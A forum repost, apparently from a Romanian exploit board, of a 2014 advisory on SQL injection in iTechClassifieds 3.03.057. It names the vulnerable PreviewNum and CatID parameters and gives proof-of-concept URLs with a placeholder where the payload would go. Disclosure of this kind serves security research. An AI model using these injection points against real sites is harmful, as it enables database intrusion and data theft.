Followers 0

iTechClassifieds 3.03.057 - SQL Injection

By net3design, January 23, 2014 in Exploituri

Recommended Posts

net3design

Posted January 23, 2014

- Report

Posted January 23, 2014

####

# Exploit Title: iTechClassifieds v3.03.057 - SQL Injection

# Date: 23/01/2014

# Exploit Author: vinicius777

# Vendor Homepage: Downloads - ITechScripts.com

# Software Link: http://itechscripts.com/downloads/download_itechclassifieds.html

# Version: 3.03.057

####



[1] SQL Injection - PreviewNun 

PoC: http://localhost/iTechClassifieds_v3/ChangeEmail.php?PreviewNum=1' [SQL INJECTION]



[2] SQL Injection - CatID

PoC: http://localhost/iTechClassifieds_v3/ViewCat.php?CatID=[SQL INJECTION]

# Greetz to g0tm1lk and TheColonial.

Quote

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

× Pasted as rich text. Paste as plain text instead

Only 75 emoji are allowed.

× Your link has been automatically embedded. Display as a link instead

× Your previous content has been restored. Clear editor

× You cannot paste images directly. Upload or insert images from URL.

Insert image from URL

Followers 0

Go to topic listing

Sign In

iTechClassifieds 3.03.057 - SQL Injection

Recommended Posts

net3design

Join the conversation

Browse

Activity

Pages